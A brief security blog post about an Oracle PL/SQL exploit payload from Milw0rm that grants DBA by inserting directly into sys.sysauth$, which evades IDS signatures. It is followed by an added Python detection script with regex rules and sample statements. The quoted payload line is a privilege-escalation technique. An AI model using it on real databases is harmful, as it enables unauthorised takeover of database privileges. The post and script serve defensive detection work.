Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Interesting Payload to PLSQL exploit at Milw0rm

Interesting exploit payload below.

http://www.milw0rm.com/exploits/3177

——————————–

v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';

——————————-

Instead of issuing GRANT DBA TO SCOTT, the exploit payload inserts the values directly into sys.sysauth$.

This will bypass many IDS signatures. David mentioned this to me quite a while ago, and it is now public, so better update those IDS rules.
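
One way to write such a rule, as an added example (not code from the original post or from the exploit): a Python check that normalizes captured SQL text and flags writes to sysauth$ alongside GRANT DBA. The rule names, the sample statements and the user id 57 are constructed for illustration.

```python
import re

# Rule names are hypothetical labels for this example, not IDs from any IDS product.
RULES = {
    # The statement older signatures look for.
    "grant-dba": re.compile(r"\bgrant\b[^;]*\bdba\b[^;]*\bto\b"),
    # Any DML that writes to the role-grant dictionary table itself.
    "sysauth-write": re.compile(
        r"\b(?:insert\s+into|update|delete\s+from|merge\s+into)\s+"
        r"(?:sys\s*\.\s*)?sysauth\$(?![\w$#])"
    ),
}

def normalize(sql: str) -> str:
    """Lowercase, join adjacent string literals ('a' || 'b'), collapse whitespace."""
    sql = re.sub(r"'\s*\|\|\s*'", "", sql.lower())
    return re.sub(r"\s+", " ", sql).strip()

def classify(sql: str) -> list[str]:
    """Return the names of all rules that match the normalized statement."""
    text = normalize(sql)
    return [name for name, rx in RULES.items() if rx.search(text)]

# The payload fragment quoted in the post, on one line.
PAGE_PAYLOAD = ("v_commands := 'insert into sys.sysauth$ ' || ' values' || "
                "'(' || v_user_id || ',4,' || '999,null)';")

# Constructed sample statements, as a sensor or audit trail might capture them.
SAMPLES = [
    "GRANT DBA TO SCOTT",
    PAGE_PAYLOAD,
    "INSERT  INTO SYS . SYSAUTH$\n VALUES (57,4,999,NULL)",
    "select grantee#, privilege# from sys.sysauth$",  # read only, not flagged
    "select ename from scott.emp",
]

if __name__ == "__main__":
    for stmt in SAMPLES:
        hits = classify(stmt) or ["-"]
        print(", ".join(hits), "<-", stmt.replace("\n", " "))
```

Reads of sysauth$ are deliberately left unflagged here; only statements that modify the table or grant DBA raise a hit.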
